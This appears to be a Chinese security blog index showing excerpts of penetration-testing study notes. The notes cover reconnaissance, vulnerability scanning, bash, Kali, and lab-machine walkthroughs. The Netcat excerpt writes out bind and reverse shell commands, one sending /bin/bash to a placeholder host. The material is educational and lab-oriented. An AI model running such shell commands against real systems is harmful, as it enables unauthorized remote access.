🎐清风.

# OWASP TOP 10 渗透测试第一步，信息收集！ 这个是用来干什么的？ 什么编程语言写的？ web 服务中间件是那个？ # 枚举中间件 需要找到技术栈 编程语言和框架 web 中间件 数据库版本 OS 信息 通过检查后缀名判断编程语言 通过浏览器的调试功能，寻找更多的信息 找一找隐藏的表单 通过 Network 选项卡，检查请求头 X-* 的是非标准的请求头，可能有更多的信息 sitemap 可能也有敏感信息，但是实战中感觉其实没那么大作用。比如: robots.txt 或者 sitemap.xml 找后台，或者控制台。可能会限制访问或者需要账号密码。 #...

# 漏洞扫描器工作过程 检测目标机器是否在线 进行全端口或可能存在的端口扫描 识别操作系统版本信息 尝试识别服务信息 发送可能存在的漏洞 payload 可能会存在很多误报，因为发送 payload，并返回了某些 res 不代表漏洞一定存在 同样的，如果管理员设置了某些机制，可能导致返回相应的 res，但不代表漏洞就不存在。 漏扫是批量进行的，可以使用人工干预，如果发现常用的中间件，可以人工选择可能的 poc。 漏扫会根据设置的不同进行不同程度的扫描，比如如果带有登录凭证的漏扫可能扫描的结果会更丰富一些。 # 用 nessus 进行漏扫 支持 13...

# DNS 信息收集 使用 host 命令可以搜索 IP 地址 还有一些其他的参数 当然，以下是一个简单的表格，列出了 host 命令的使用和各种参数： 用途 命令示例 查询主机名对应的 IP 地址 host example.com 查询 IP 地址对应的主机名 host 192.168.1.1 指定查询的 DNS 服务器 host example.com dns_server_ip 查询指定类型的记录（如 MX 记录、NS 记录等） host -t mx example.com 指定查询的协议类型（如 IPv4 或 IPv6） host -4...

界定：不与目标系统产生任何联系，或者仅作为正常用户进行交互 通过浏览网站，获取信息 企业邮箱 + 社交账号 whois 信息，查找注册人等信息。whois 支持反向查找，使用 ip 进行搜索。 Google Hacking，不多讲 ==、 https://www.netcraft.com https://searchdns.netcraft.com https://sitereport.netcraft.com/?url= recon-ng 进行被动信息收集，可能需要 api_key 进行，工具的使用可能还需要翻墙，感觉国内不友好。 github、gitlab、sourceforge...

bash 是一个包含一系列命令的纯文本文件，通常以 .sh 结尾，执行前必须有可执行权限。 # 变量 跟编程很像，声明直接声明 A=SB ，调用的时候加一个 $ 就行： echo '我是$A' 声明的变脸如果有空格，要用引号包起来 可以通过 $() 执行命令： user=$(whoami) ，这样运行 echo $user 会直接显示用户名 # 参数 在 Bash 编程中，你可以通过使用特定的变量来获取传递给脚本或函数的参数。这些特定的变量是： $0：表示脚本或函数的名称。 $1, $2, $3, ...：表示传递给脚本或函数的位置参数，其中 $1 表示第一个参数，$2...

# Netcat 很牛逼的工具，可以创建 TCP 或 UDP 的连接，同时可以是服务端也可以是客户端。 -n 跳过 dns 解析 -v 显示详情 -l 监听 -p 指定端口 可以使用重定向符号进行传文件的传递 -e 可以指定执行程序，并重定向输入输出到这个程序上，如: nc -lnvp 4444 -e cmd.exe ，然后使用 nc 连这个端口就能拿到 shell 当然上面那个是监听端启动 shell，也可以建立最常用的反向连接： nc -nv X.X.X.X 4444 -e /bin/bash # socat 用法： socat - TCP4:X.X.X.X:110 ，建立 110...

# 环境变量 Bash 是一种 shell，结合了 corn shell 和 seashell 的。 环境变量： $PATH 、 $NAME 、 $PWD 、 HOME$ 。 可以使用 export 定义一个环境变量，这样可以快速在当前 shell 和子 shell 中使用变量。如果不使用 export 导出，那么定义的变量只能在当前 shell 中使用。 可以通过 env 查看环境变量信息 # 历史命令 多的不赘述 按下 Ctrl + r 可以启用搜索功能，通过键入字符找到最近的相似命令，回车进行执行。 #...

最好使用 x64，确保一致性 创建后即时 passwd 修改密码 建议使用 kali 账户，使用 root 虽然方便但容易导致系统受损。使用 sodu 执行管理员权限。 预装了各种工具，坏蛋时间浏览菜单，帮助认识结构和工具。 关注 kali 官方文档和论坛，用来排除故障，工具站可以查询和定制工具。有时间可以看看。官网有使用手册和培训。网站的信息在 kali 的浏览器的收藏栏里。 简单介绍了一下目录结构。和 Linux 很像。 提供用户手册 man ， -k 参数可以更快速地定位需要查找的内容 ls 的使用，讲了可以使用通配符和 - al 参数 cd 的使用，还有 pwd find 、...

# 靶场搭建 下载，导入，开箱即食。 IP: 192.168.1.130 # 渗透测试 # 信息初收集 PORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 6.7p1 Ubuntu 5ubuntu1.3 (Ubuntu Linux; protocol 2.0)| ssh-hostkey: | 1024 cb:47:92:da:ea:b8:d3:82:16:22:0d:a5:5f:05:47:51 (DSA)| 2048 fd:93:9d:28:57:fb:ef:e0:8e:f1:93:66:03:67:35:50 (RSA)| 256...

# 靶机搭建 直接打开，导入，修改网卡为 NAT 模式 IP 地址： 192.168.174.131 # 渗透过程 # 信息初收集 21/tcp open ftp 22/tcp open ssh 80/tcp open http 使用 ftp 用户登录 ftp 看看，有一个用户列表的备份文件 21/tcp open ftp22/tcp open ssh80/tcp open http```plainabatchyjohnmaiannedoomguyabatchyjohnmaiannedoomguy扫描路径发现存在 robots.txt，打开后发现一个敏感目录...